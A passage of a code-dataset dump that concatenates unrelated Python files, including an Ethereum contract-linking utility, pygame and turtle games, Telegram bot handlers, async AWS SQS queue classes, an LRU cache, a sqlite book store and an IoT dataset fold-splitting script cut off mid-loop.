raise ValueError(\n \"Multiple candidates found trying to expand '{0}'. Found '{1}'. \"\n \"Searched '{2}'\".format(\n name,\n ','.join(candidates),\n ','.join(full_names),\n )\n )\n else:\n raise ValueError(\n \"Unable to expand '{0}'. 
\"\n \"Searched '{1}'\".format(\n name,\n ','.join(full_names),\n )\n )\n\n\ndef link_bytecode(bytecode, **dependencies):\n \"\"\"\n Given the bytecode for a contract, and it's dependencies in the form of\n {contract_name: address} this functino returns the bytecode with all of the\n link references replaced with the dependency addresses.\n \"\"\"\n linker_fn = compose(*(\n functools.partial(\n make_link_regex(name).sub,\n remove_0x_prefix(address),\n )\n for name, address in dependencies.items()\n ))\n linked_bytecode = linker_fn(bytecode)\n return linked_bytecode\n\n\ndef get_contract_library_dependencies(bytecode, full_contract_names):\n \"\"\"\n Given a contract bytecode and an iterable of all of the known full names of\n contracts, returns a set of the contract names that this contract bytecode\n depends on.\n\n To get the full dependency graph use the `get_recursive_contract_dependencies`\n function.\n \"\"\"\n expand_fn = functools.partial(\n expand_shortened_reference_name,\n full_names=full_contract_names,\n )\n return {\n expand_fn(name) for name in find_link_references(bytecode)\n }\n\n\ndef get_shallow_dependency_graph(contracts):\n \"\"\"\n Given a dictionary of compiled contract data, this returns a *shallow*\n dependency graph of each contracts explicit link dependencies.\n \"\"\"\n dependencies = {\n contract_name: get_contract_library_dependencies(\n contract_data['code'],\n contracts.keys(),\n )\n for contract_name, contract_data\n in contracts.items()\n if contract_data.get('code') is not None\n }\n return dependencies\n\n\ndef get_contract_deploy_order(dependency_graph):\n return toposort.toposort_flatten(dependency_graph)\n\n\ndef get_recursive_contract_dependencies(contract_name, dependency_graph):\n \"\"\"\n Recursive computation of the linker dependencies for a specific contract\n within a contract dependency graph.\n \"\"\"\n return set(itertools.chain(\n dependency_graph.get(contract_name, set()), *(\n get_recursive_contract_dependencies(dep, dependency_graph)\n for dep in dependency_graph.get(contract_name, set())\n )\n ))\n","sub_path":"populus/utils/contracts.py","file_name":"contracts.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"110717873","text":"import sys\nimport pygame\nfrom pygame.time import Clock\nfrom pygame.locals import *\nfrom support import load_image, load_sound\nfrom math import pi\n\nfrom secs import World\n\npygame.init()\nsurface = pygame.display.set_mode((468, 69))\npygame.display.set_caption('Monkey SECS Fever')\nclock = Clock()\n\ncontext = dict()\nevents = list()\ncontext[\"events\"] = events\n\nimages = list()\nimages.append(load_image(\"chimp.bmp\", -1))\nimages.append(pygame.transform.flip(images[0], 1, 0))\nimages.append(load_image(\"fist.bmp\", -1))\n\nsounds = list()\nsounds.append(load_sound(\"punch.wav\"))\nsounds.append(load_sound(\"whiff.wav\"))\n\nw = World()\n\nw.define_component(\"blitable\", {\"image_id\": 0})\nw.define_component(\"position\", {\"x\": 0, \"y\": 0, \"z\": 0})\nw.define_component(\"velocity\", {\"pixels_per_ms\": 0.0})\nw.define_component(\"rotation\", {\"base_angle\": pi / 2,\n \"angle\": pi / 2,\n \"degrees\": 0,\n \"rot_direction\": 0,\n \"rads_per_ms\": pi / 48})\nw.define_component(\"slide_toggle\", {\"min_x\": 0, \"max_x\": 0, \"direction\": 1})\n\n# Index blitable entities to make rendering more efficient\nblitable_mask = w.add_entity_index(\"blitable\")\n\n\ndef rotation_system_handler(state, entity, 
delta):\n if entity.rot_direction != 0:\n entity.angle += entity.rads_per_ms * entity.direction\n if entity.angle < 0 or entity.angle > pi * 2:\n entity.angle = entity.base_angle\n entity.rot_direction = 0\n entity.degrees = 0\n entity.degrees = entity.angle * (180.0 / pi)\n\nw.define_system(\n None,\n rotation_system_handler,\n \"rotation\"\n)\n\n\ndef slide_toggle_system(state, entity, delta):\n if entity.x > entity.max_x:\n entity.direction *= -1\n entity.image_id = 1\n entity.x = entity.max_x\n elif entity.x < entity.min_x:\n entity.direction *= -1\n entity.image_id = 0\n entity.x = entity.min_x\n else:\n entity.x += entity.direction * entity.pixels_per_ms\n\n\nw.define_system(\n None,\n slide_toggle_system,\n \"position\", \"velocity\", \"slide_toggle\"\n)\n\nfist_id = w.make_entity(\"position\", \"blitable\")\nw.set_entity_properties(fist_id, **{\n \"image_id\": 2,\n \"x\": 0,\n \"y\": 0,\n \"z\": 1\n})\n\nchimp_id = w.make_entity(\"position\", \"velocity\", \"slide_toggle\", \"blitable\", \"rotation\")\nw.set_entity_properties(chimp_id, **{\n \"image_id\": 0,\n \"x\": 0,\n \"y\": 0,\n \"z\": 0,\n \"min_x\": 0,\n \"max_x\": 414,\n \"pixels_per_ms\": 3\n})\n\n\npygame.mouse.set_visible(0)\nw.process_entities(0)\n\nacc = 0\nwhile True:\n del events[:]\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == MOUSEMOTION:\n w.set_entity_properties(fist_id, **{\"x\": event.pos[0] - 28, \"y\": event.pos[1] - 5})\n elif event.type == MOUSEBUTTONDOWN:\n chimp_rect = Rect(w.get_entity_properties(chimp_id, \"x\", \"y\"), (54, 79))\n fist_rect = Rect(w.get_entity_properties(fist_id, \"x\", \"y\"), (42, 75))\n if chimp_rect.colliderect(fist_rect):\n sounds[0].play()\n w.set_entity_properties(chimp_id, **{\"rot_direction\": 1})\n else:\n sounds[1].play()\n\n delta = clock.tick(60)\n acc += delta\n if acc > 3000:\n acc = 0\n print(\"FPS = %s\" % clock.get_fps())\n w.process_entities(delta)\n\n surface.fill(0)\n for entity in sorted(w.entity_index[blitable_mask], key=lambda e: e.z):\n if w.entity_has_components(entity, \"rotation\") and entity.rot_direction != 0:\n surface.blit(pygame.transform.rotate(images[entity.image_id], entity.degrees), (entity.x, entity.y))\n else:\n surface.blit(images[entity.image_id], (entity.x, entity.y))\n\n pygame.display.flip()\n","sub_path":"chimp.py","file_name":"chimp.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"539013219","text":"# File for handlers which provide information\n\nimport pandas as pd\n\nfrom setup_database import open_close_database\n\nfrom telegram.ext import CommandHandler\n\n\ndef get_info_handlers():\n return [\n CommandHandler('my_stickers', my_stickers),\n CommandHandler('my_packs', my_packs)\n ]\n\n\n@open_close_database\ndef my_stickers(update, context, mydb, mycursor):\n user_id = update.message.from_user.id\n sql = '''\n select\n t2.pack_name,\n t3.sticker_shortcut\n from user_packs t1\n\n inner join pack_info t2\n on true\n and t1.user_id = %s\n and t1.pack_id = t2.pack_id\n\n inner join pack_stickers t3\n on t1.pack_id = t3.pack_id\n ;'''\n val = (user_id,)\n mycursor.execute(sql, val)\n\n pack_shortcut = mycursor.fetchall()\n pack_sticker_list = pd.DataFrame(\n pack_shortcut,\n columns=['pack_name', 'sticker_shortcut']).groupby('pack_name')[\n 'sticker_shortcut'\n ].apply(lambda x: x.tolist()).reset_index().values.tolist()\n\n answer = '\\n\\n'.join(\n f'{pack}:\\n' + 
'\\n'.join(stickers)\n for pack, stickers in pack_sticker_list)\n\n update.message.reply_text(\n f'These are stickers you can currently use \\\nsorted by packs:\\n\\n{answer}',\n parse_mode='html')\n\n\n@open_close_database\ndef my_packs(update, context, mydb, mycursor):\n user_id = update.message.from_user.id\n answer = get_user_packs(user_id=user_id)\n\n update.message.reply_text(\n f'These are names and ids of packs you can currently use:\\n\\n{answer}')\n\n\n@open_close_database\ndef get_user_packs(user_id, mydb, mycursor):\n sql = '''\n select\n t1.pack_id,\n t2.pack_name\n from user_packs t1\n\n inner join pack_info t2\n on true\n and t1.user_id = %s\n and t1.pack_id = t2.pack_id\n '''\n val = (user_id,)\n mycursor.execute(sql, val)\n pack_id_name = mycursor.fetchall()\n\n answer = '\\n'.join([\n f'{pack_name}: {pack_id}' for pack_id, pack_name in pack_id_name\n ])\n return answer\n","sub_path":"info_handlers.py","file_name":"info_handlers.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"90514352","text":"\"\"\"\nAWS SQS Interfaces\n~~~~~~~~~~~~~~~~~~\n\n\"\"\"\nimport logging\nfrom typing import Dict, Any, Optional, AsyncGenerator\n\nimport botocore.exceptions\nfrom pyapp_ext.aiobotocore import aio_create_client\nfrom pyapp_ext.messaging.aio import MessageSender, MessageReceiver, Message\nfrom pyapp_ext.messaging.exceptions import QueueNotFound, ClientError\n\nfrom .utils import parse_attributes, build_attributes\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass SQSBase:\n \"\"\"\n Base Message Queue\n \"\"\"\n\n __slots__ = (\"queue_name\", \"aws_config\", \"client_args\", \"_client\", \"_queue_url\", \"loop\")\n\n def __init__(\n self,\n *,\n queue_name: str,\n aws_config: str = None,\n client_args: Dict[str, Any] = None,\n ):\n self.queue_name = queue_name\n self.aws_config = aws_config\n self.client_args = client_args or {}\n\n self._client = None\n self._queue_url: Optional[str] = None\n\n def __repr__(self):\n return f\"{type(self).__name__}(queue_name={self.queue_name!r})\"\n\n async def open(self):\n \"\"\"\n Open queue\n \"\"\"\n client = await aio_create_client(\"sqs\", self.aws_config, **self.client_args)\n\n try:\n response = await client.get_queue_url(QueueName=self.queue_name)\n\n except botocore.exceptions.ClientError as ex:\n await client.close()\n\n error_code = ex.response[\"Error\"][\"Code\"]\n if error_code == \"AWS.SimpleQueueService.NonExistentQueue\":\n raise QueueNotFound(f\"Unable to find queue `{self.queue_name}`\")\n\n raise ClientError(error_code) from ex\n\n except Exception as ex:\n await client.close()\n raise ClientError() from ex\n\n self._client = client\n self._queue_url = response[\"QueueUrl\"]\n\n async def close(self):\n \"\"\"\n Close the queue\n \"\"\"\n if self._client:\n await self._client.close()\n self._client = None\n\n self._queue_url = None\n\n async def configure(self):\n \"\"\"\n Define any send queues\n \"\"\"\n async with await aio_create_client(\"sqs\", self.aws_config, **self.client_args) as client:\n try:\n response = await client.create_queue(QueueName=self.queue_name)\n\n except botocore.exceptions.ClientError as ex:\n error_code = ex.response[\"Error\"][\"Code\"]\n raise ClientError(error_code) from ex\n\n except Exception as ex:\n raise ClientError() from ex\n\n return response[\"QueueUrl\"]\n\n\nclass SQSSender(SQSBase, MessageSender):\n \"\"\"\n Message sending interface for SQS\n \"\"\"\n\n __slots__ = ()\n\n async def 
send_raw(self, body: bytes, *, content_type: str = None, content_encoding: str = None) -> str:\n        \"\"\"\n        Publish a raw message (message is raw bytes)\n        \"\"\"\n        attributes = build_attributes(\n            ContentType=content_type, ContentEncoding=content_encoding\n        )\n        response = await self._client.send_message(\n            QueueUrl=self._queue_url, MessageBody=body, MessageAttributes=attributes\n        )\n        return response[\"MessageId\"]\n\n\nclass SQSReceiver(SQSBase, MessageReceiver):\n    \"\"\"\n    Message receiving for SQS\n    \"\"\"\n\n    __slots__ = (\"wait_time\",)\n\n    def __init__(self, *, wait_time: int = 10, **kwargs):\n        super().__init__(**kwargs)\n        self.wait_time = wait_time\n\n    async def handle_invalid_message(self, message: Message):\n        \"\"\"\n        Handle an invalid message\n        \"\"\"\n\n    async def receive_raw(self) -> AsyncGenerator[Message, None]:\n        \"\"\"\n        Start receiving raw responses from the queue\n        \"\"\"\n        queue_name = self.queue_name\n        client = self._client\n        queue_url = self._queue_url\n\n        LOGGER.debug(\"Starting SQS Listener: %s\", queue_name)\n\n        while True:\n            response = await client.receive_message(\n                QueueUrl=queue_url,\n                WaitTimeSeconds=self.wait_time,\n                MessageAttributeNames=[\"ContentType\", \"ContentEncoding\"],\n            )\n\n            if \"Messages\" in response:\n                for msg in response[\"Messages\"]:\n                    try:\n                        attrs = parse_attributes(\n                            msg[\"MessageAttributes\"]\n                        )\n                    except KeyError:\n                        attrs = {}\n\n                    yield Message(\n                        msg.get(\"Body\"),\n                        attrs.get(\"ContentType\"),\n                        attrs.get(\"ContentEncoding\"),\n                        msg,\n                        self\n                    )\n\n            else:\n                LOGGER.debug(\"No messages in queue %s\", queue_name)\n\n    async def delete(self, message: Message):\n        \"\"\"\n        Delete a message from the queue (e.g. after successful processing)\n        \"\"\"\n        await self._client.delete_message(\n            QueueUrl=self._queue_url,\n            ReceiptHandle=message.envelope[\"ReceiptHandle\"]\n        )\n","sub_path":"pyapp_ext/messaging_aws/aio/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} {"seq_id":"233174864","text":"from turtle import Turtle\nimport random\n\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\nX_COR = 300\nY_COR_LIST = []\nY_COR = 250\nfor y in range(8):\n    Y_COR_LIST.append(Y_COR)\n    Y_COR -= 65\n\nclass CarManager(Turtle):\n    def __init__(self):\n        super().__init__()\n        self.car_speed = STARTING_MOVE_DISTANCE\n        self.penup()\n        self.hideturtle()\n        self.last_y = 0\n        self.all_cars = []\n\n    def create_car(self):\n        new_car = Turtle()\n        new_car.penup()\n        new_car.color(random.choice(COLORS))\n        new_car.shape('square')\n        new_car.shapesize(stretch_wid=1, stretch_len=2)\n        new_car.x_cor = X_COR\n        new_car.y_cor = random.choice(Y_COR_LIST)\n        while new_car.y_cor == self.last_y:\n            new_car.y_cor = random.choice(Y_COR_LIST)\n        self.last_y = new_car.y_cor\n        new_car.goto(new_car.x_cor,new_car.y_cor)\n        self.all_cars.append(new_car)\n\n    def move(self):\n        for car in self.all_cars:\n            car.backward(self.car_speed)\n\n    def speed_up(self):\n        self.car_speed += MOVE_INCREMENT\n\n","sub_path":"Turtle_Crossing/car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} {"seq_id":"49702816","text":"#### A hacky approach #####\n\n\nT=int(input())\ndef find_set(num):\n    visited[num]=1 ### mark the node as visited on entry.\n\n    for next_ind in graph[num]: ### then take each neighbour stored in the adjacency list,\n        if visited[next_ind]==0: ### and if it has not been visited yet,\n            find_set(next_ind) ### visit it as well.\n    \n\n\n\n\nfor tc in range(1,T+1):\n    N,M = map(int,input().split())\n    graph = [[] for _ in range(N+1)]\n    visited = [0]*(N+1) ### marks visited nodes\n    arr = list(map(int,input().split()))\n    for i in range(M):\n        x = arr[2*i]\n        y = arr[2*i+1]\n        graph[x].append(y) ### add the edge to both the parent and the child node.\n        graph[y].append(x)\n    cnt = 0\n    for i in range(1,N+1):\n        if graph[i] and visited[i]==0: ### explore only nodes that have edges and were not visited yet.\n            find_set(i) \n            cnt+=1 ### one call visits every connected node, so that whole component is one group; add 1.\n        elif not graph[i]: ### a node with no edges is a group of its own, so add 1.\n            cnt+=1\n    print('#{} {}'.format(tc,cnt))","sub_path":"휴강기간_공부/알고리즘_0309/swea_5248_그룹나누기.py","file_name":"swea_5248_그룹나누기.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} {"seq_id":"246945954","text":"#!/usr/bin/python\n\nfrom pylab import *\n\n#hak5.txt\n\nsize = [1, 2, 4, 8, 12]\n\ntotaltime2 = [11.87, 13.553340, 12.626770, 12.345234, 13.721334]\ntotaltime3 = [11.87, 6.123, 3.1, 1.72, 1.3]\n\nspeedup2, = plot(size, totaltime2, 'g', label='MPI')\nspeedup3, = plot(size, totaltime3, 'r', label='MPI WITH HDF5')\nplot(size, totaltime2)\nplot(size, totaltime3)\n\nxlabel('Total number of processors used')\nylabel('Read time in seconds')\ntitle('Comparison of serial and parallel HDF5 read\\non Intel Xeon CPU X5660 @ 2.80GHz 12288 KB Cache')\nlegend2 = legend([speedup2], [\"Serial Read\"], loc=3)\nlegend3 = legend([speedup3], [\"Parallel Read w/ HDF5\"], loc=4)\ngca().add_artist(legend2)\ngca().add_artist(legend3)\ngrid(True)\nsavefig(\"serial_hdf5_read.png\")\nshow()\n\n","sub_path":"report/read-serial-parallel.py","file_name":"read-serial-parallel.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} {"seq_id":"346752738","text":"import time\nimport concurrent.futures\n\nstart = time.perf_counter()\n\n\ndef do_something(seconds):\n    print(f\"sleeping {seconds} sec...\")\n    time.sleep(seconds)\n    return f\"done sleeping...{seconds}\"\n\n\nwith concurrent.futures.ThreadPoolExecutor() as executor:\n    # context manager\n    # f1 = executor.submit(do_something, 1) # arg = 1\n    # print(f1.result())\n\n    secs = [5, 3, 4, 2, 1]\n\n    # results = [executor.submit(do_something, sec) for sec in secs]\n    # for f in concurrent.futures.as_completed(results):\n    #     print(f.result())\n\n    results = executor.map(do_something, secs)\n    for result in results:\n        print(result)\n\nfinish = time.perf_counter()\n\nprint(f\"finished in {round(finish-start, 2)} seconds(s)\")\n\n# finished all the threads in almost 1.5 sec\n","sub_path":"threads/basics/hello-concurrent.py","file_name":"hello-concurrent.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} {"seq_id":"600576393","text":"# Using the data structures you have mastered, design and implement an LRU (least recently used) cache. It should support the following operations: get and put.\n#\n# get(key) - if the key exists in the cache, return its value (always positive); otherwise return -1.\n# put(key, value) - if the key does not exist, write its value. When the cache is at capacity, delete the least recently used value before writing the new data, to make room for the new value.\n\n\nclass ListNode:\n    def __init__(self, key=None, value=None):\n        self.value = value\n        self.key = key\n        self.next = None\n        self.pre = None\n\n\nclass LRUCache:\n    def __init__(self, capacity):\n        self.capacity = capacity\n        self.hashmap = {}\n        self.pre = None\n        self.next = None\n\n        # build the doubly linked list sentinels\n        self.head = ListNode()\n        self.tail = ListNode()\n        self.head.next = self.tail\n        self.tail.pre = self.head\n\n    
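# A quick usage sketch (hypothetical driver, not part of the original file):\n    #   cache = LRUCache(2)\n    #   cache.put(1, 1); cache.put(2, 2)\n    #   cache.get(1)     # returns 1 and makes key 1 the most recently used\n    #   cache.put(3, 3)  # evicts key 2, the least recently used entry\n    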
def add_node_to_head(self, key, value):\n        new = ListNode(key, value)\n        self.hashmap[key] = new\n        new.pre = self.head\n        new.next = self.head.next\n\n        self.head.next.pre = new\n        self.head.next = new\n\n    def move_node_to_head(self, key):\n        node = self.hashmap[key]\n        # first unlink the node from its current position\n        node.pre.next = node.next\n        node.next.pre = node.pre\n        # then relink it right behind the head\n        node.pre = self.head\n        node.next = self.head.next\n\n        self.head.next.pre = node\n        self.head.next = node\n\n    def pop_tail(self):\n        last_node = self.tail.pre\n        self.hashmap.pop(last_node.key)\n        last_node.pre.next = self.tail\n        self.tail.pre = last_node.pre\n        return last_node\n\n    def get(self, key):\n        if key in self.hashmap:\n            self.move_node_to_head(key)\n        res = self.hashmap.get(key, -1)\n        if res == -1:\n            return res\n        else:\n            return res.value\n\n    def put(self, key, value):\n        if key in self.hashmap:\n            self.hashmap[key].value = value\n            self.move_node_to_head(key)\n        else:\n            if len(self.hashmap) >= self.capacity:\n                self.pop_tail()\n            self.add_node_to_head(key, value)\n\n\n\n\n\n\n\n","sub_path":"leetcode146_LRU缓存机制.py","file_name":"leetcode146_LRU缓存机制.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} {"seq_id":"498699169","text":"# -*- coding=utf-8 -*-\n\nfrom toolkit.web_framework.dispatcher import Dispatcher\nfrom model.connection import dbmanager\nfrom model.orm.wechat_profile import WechatProfile\n\n\nclass Demo(Dispatcher):\n\n    cls_url = 'demo'\n\n    def show(self):\n        return ([{'welcome': \"Hello World\"}], '', 'json', '0', '', '', '')\n\n    def get_nickname(self):\n        _id = \"cbc6706c-5ab9-464c-a6b7-4d28dd464976\"\n        res = dbmanager.query(WechatProfile).filter_by(id=_id).first()\n        return ([{'nickname': res.nickname}], '', 'json', '0', '', '', '')\n","sub_path":"backend/api/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} {"seq_id":"115413713","text":"class Solution:\n    def rotate(self, nums: List[int], k: int) -> None:\n        \"\"\"\n        Do not return anything, modify nums in-place instead.\n        \"\"\"\n        while k > len(nums):\n            k -= len(nums)\n        if k == 0:\n            return\n        l = len(nums) - k\n        for i in range(l // 2):\n            tmp = nums[i]\n            nums[i] = nums[l - 1 - i]\n            nums[l - 1 - i] = tmp\n        for i in range(k // 2):\n            tmp = nums[l + i]\n            nums[l + i] = nums[-1 - i]\n            nums[-1 - i] = tmp\n        for i in range(len(nums) // 2):\n            tmp = nums[i]\n            nums[i] = nums[-1 - i]\n            nums[-1 - i] = tmp\n","sub_path":"leetcode/0101-0200/0189_O(1)space.py","file_name":"0189_O(1)space.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} {"seq_id":"603862873","text":"import sqlite3 as sql\nimport time\nclass book_implemetion:\n\n    def __init__(self,name=\"\",writer=\"\",publisher=\"\",book_type=\"\",year=None,id=\"\"):\n        self.name=name\n        self.writer=writer\n        self.publisher=publisher\n        self.book_type=book_type\n        self.year=year\n        self.id=id\n\n    def __str__(self):\n        return \"Name: {}\\nwriter: {}\\npublisher: {}\\nbook_type: {}\\nyear: {}\\nId: {}\\n\".format(self.name,self.writer,\n                                                    self.publisher,self.book_type,self.year,self.id)\n\nclass Book_Data_base:\n\n    def __init__(self):\n        self.baglanti_olustur()\n\n    def baglanti_olustur(self):\n        self.con=sql.connect(\"Books.db\",timeout=10)\n        self.imlec=self.con.cursor()\n        sorgu = \"Create Table If not Exists Books(name TEXT ,writer TEXT,publisher TEXT,book_type TEXT,year INT ,id TEXT)\"\n        
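# CREATE TABLE IF NOT EXISTS keeps reconnects idempotent: the first run builds the schema, later runs are no-ops.\n        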
self.imlec.execute(sorgu)\n        self.con.commit()\n\n    def baglanti_kes(self):\n        self.con.close()\n\n    def Insert_data(self,book):\n        sorgu=\"Insert Into Books values(?,?,?,?,?,?)\"\n        self.imlec.execute(sorgu, (book.name, book.writer, book.publisher,book.book_type,book.year,book.id))\n        self.con.commit()\n\n    def Ask_Book(self,name):\n        self.imlec.execute(\"Select * From Books where name = ?\",(name,))\n        books=self.imlec.fetchall()\n        if(len(books)==0):\n            print(\"No book with that name exists\")\n        else:\n            book=book_implemetion(books[0][0],books[0][1],books[0][2],books[0][3],books[0][4],books[0][5])\n            print(book)\n\n    def buy_Book(self,id):\n        self.imlec.execute(\"Select * From Books where id = ?\",(id,))\n        Books=self.imlec.fetchall()\n        if(len(Books)==0):\n            print(\"No matching product exists\")\n        else:\n            # Rebuild the whole record for display, as Ask_Book does\n            Book=book_implemetion(Books[0][0],Books[0][1],Books[0][2],Books[0][3],Books[0][4],Books[0][5])\n\n            # Count purchases; start from 0 on the first call\n            self.take = getattr(self, \"take\", 0) + 1\n            print(Book)\n\n    def Show_Books(self):\n        self.imlec.execute(\"Select * From Books\")\n        show_books=self.imlec.fetchall()\n        if(len(show_books)==0):\n            print(\"There are no books\")\n        else:\n            for data in show_books:\n                print(book_implemetion(data[0],data[1],data[2],data[3],data[4],data[5]))\n\n\n    def Count_Books(self):\n        self.imlec.execute(\"Select * From Books\")\n        count_books=self.imlec.fetchall()\n        count=0\n        for data in count_books:\n            count+=1\n        print(count)\n\n\n    def Delet_column(self):\n        # Remove every row from the Books table\n        self.imlec.execute(\"DELETE FROM Books\")\n        self.con.commit()\n        print(\"All records were deleted\")\n","sub_path":"proje.py","file_name":"proje.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} {"seq_id":"358803992","text":"import time\n\nstart_time = time.time()\n\nf = open('names_1.txt', 'r')\nnames_1 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nf = open('names_2.txt', 'r')\nnames_2 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\n# Since both files are read into a list I'm going to use a set type.\n\n# Python Docs:\n# intersection(*others)\n# set & other & ...\n# Return a new set with elements common to the set and all others.\n\n# So duplicates will be set to the common intersection of the names list\n# Oh wait nevermind I can't use this hmm\n# duplicates = set(names_1).intersection(names_2)\n\n# Maybe I'll try different for loop configurations\n# Declare dups\nduplicates = [name for name in names_1 if name in names_2] # maybe I can use a comprehension\n\n# for name_1 in names_1:\n#     for name_2 in names_2:\n#         if name_1 == name_2:\n#             duplicates.append(name_1)\n\nend_time = time.time()\nprint (f\"{len(duplicates)} duplicates:\\n\\n{', '.join(duplicates)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n","sub_path":"names/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} {"seq_id":"344597294","text":"__author__ = 'haim.levy@post.idc.ac.il'\n\nfrom os import listdir\nfrom os.path import isfile, join\nimport random\n\nfrom Base import *\nfrom DeviceTagsLoader import *\n\noracle_fn = 'seen_oracle.csv'\nSAMPLES_IN_DIR = '../2_fdb2features/seen_samples/'\nALL_IN_DIR = '../2_fdb2features/seen_all/'\nOUT_MAIN = './seen_w_all_folds/'\nOUT_TRAIN = 'train/'\nOUT_TEST = 'test/'\n\n\ndef get_len(oracle, isiot):\n    ln = 0\n    for dev in oracle.values():\n        if int(dev.isiot) == int(isiot):\n            ln += 1\n    return ln\n\n\ndef get_lengthes(oracle, train_ratio):\n    iot_len, not_len = get_len(oracle, 1), 
get_len(oracle, 0)\n train_iot_len = int(round(iot_len * train_ratio))\n test_iot_len = int(round(iot_len * (1 - train_ratio)))\n if train_iot_len + test_iot_len > iot_len:\n test_iot_len -= 1\n train_not_len = int(round(not_len * train_ratio))\n test_not_len = int(round(not_len * (1 - train_ratio)))\n if train_not_len + test_not_len > not_len:\n test_not_len -= 1\n\n return train_iot_len, test_iot_len, train_not_len, test_not_len\n\n\ndef get_keys(oracle):\n iot_keys = []\n not_keys = []\n for dev in oracle.values():\n if dev.isiot == 0:\n not_keys.append(dev.mac)\n else:\n iot_keys.append(dev.mac)\n random.shuffle(iot_keys)\n random.shuffle(iot_keys)\n random.shuffle(iot_keys)\n random.shuffle(not_keys)\n random.shuffle(not_keys)\n random.shuffle(not_keys)\n return iot_keys, not_keys\n\n\ndef split_devs(oracle, train_ratio=0.8):\n train_oracle = {}\n test_oracle = {}\n train_iot_len, test_iot_len, train_not_len, test_not_len = get_lengthes(oracle, train_ratio)\n iot_keys, not_keys = get_keys(oracle)\n\n train_iot_keys = iot_keys[:train_iot_len]\n train_not_keys = not_keys[:train_not_len]\n\n test_iot_keys = iot_keys[train_iot_len:]\n test_not_keys = not_keys[train_not_len:]\n\n for k, v in oracle.items():\n if k in train_iot_keys or k in train_not_keys:\n train_oracle[k] = v\n if k in test_iot_keys or k in test_not_keys:\n test_oracle[k] = v\n\n return train_oracle, test_oracle\n\n\ndef make_folds(oracle):\n folds = []\n iot_k, not_k = get_keys(oracle)\n ilen, nlen = len(iot_k), len(not_k)\n\n for i in xrange(5):\n end_iot_curr = (i+1) * int(round(ilen * 0.2))\n end_not_curr = (i+1) * int(round(nlen * 0.2))\n if i == 4:\n end_iot_curr = ilen\n end_not_curr = nlen\n test_iot = iot_k[int(round(ilen * 0.2)) * i: end_iot_curr]\n test_not = not_k[int(round(nlen * 0.2)) * i: end_not_curr]\n train_iot = []\n for k in iot_k:\n if k not in test_iot:\n train_iot.append(k)\n train_not = []\n for k in not_k:\n if k not in test_not:\n train_not.append(k)\n\n folds.append(((train_iot + train_not), (test_iot + test_not)))\n return folds\n\n\ndef make_oracles(oracle, train, test):\n train_oracle, test_oracle = {}, {}\n for k, v in oracle.items():\n if k in train:\n train_oracle[k] = v\n if k in test:\n test_oracle[k] = v\n return train_oracle, test_oracle\n\n\ndef get_files_names():\n iot_dir = SAMPLES_IN_DIR + 'IOT/'\n not_dir = SAMPLES_IN_DIR + 'NOT/'\n iotfiles = [iot_dir + f for f in listdir(iot_dir) if isfile(join(iot_dir, f))]\n notfiles = [not_dir + f for f in listdir(not_dir) if isfile(join(not_dir, f))]\n return iotfiles + notfiles\n\n\ndef copy_files_per_oracle(oracle, infiles, pre_path):\n for k, v in oracle.items():\n name = get_dev_file_name(v)\n related_files = []\n for nm in infiles:\n if name[2:].lower() in nm.lower():\n related_files.append(nm)\n oracle[k].files = related_files\n for fl in related_files:\n out_fn = pre_path + '/' + name\n ifl = open(fl, 'r')\n ofl = open(out_fn, 'a')\n ofl.write(ifl.read())\n ifl.close()\n ofl.close()\n\n\ndef prepare_folders():\n tr_name = OUT_TRAIN\n ts_name = OUT_TEST\n for i in xrange(5):\n create_folder(OUT_MAIN)\n fold = OUT_MAIN + str(i) + '_fold/'\n create_folder(fold)\n create_folder(fold + tr_name)\n create_folder(fold + ts_name)\n create_folder(fold + tr_name + '/NOT')\n create_folder(fold + tr_name + '/IOT')\n create_folder(fold + ts_name + '/NOT')\n create_folder(fold + ts_name + '/IOT')\n return tr_name, ts_name\n\n\ndef map_samples_to_all(files):\n res = []\n for fl in files:\n #print fl\n fl = fl.replace(\"seen_samples\", \"seen_all\")\n 
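# Swap the seen_samples directory for seen_all so the test fold uses the full-trace feature files.\n        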
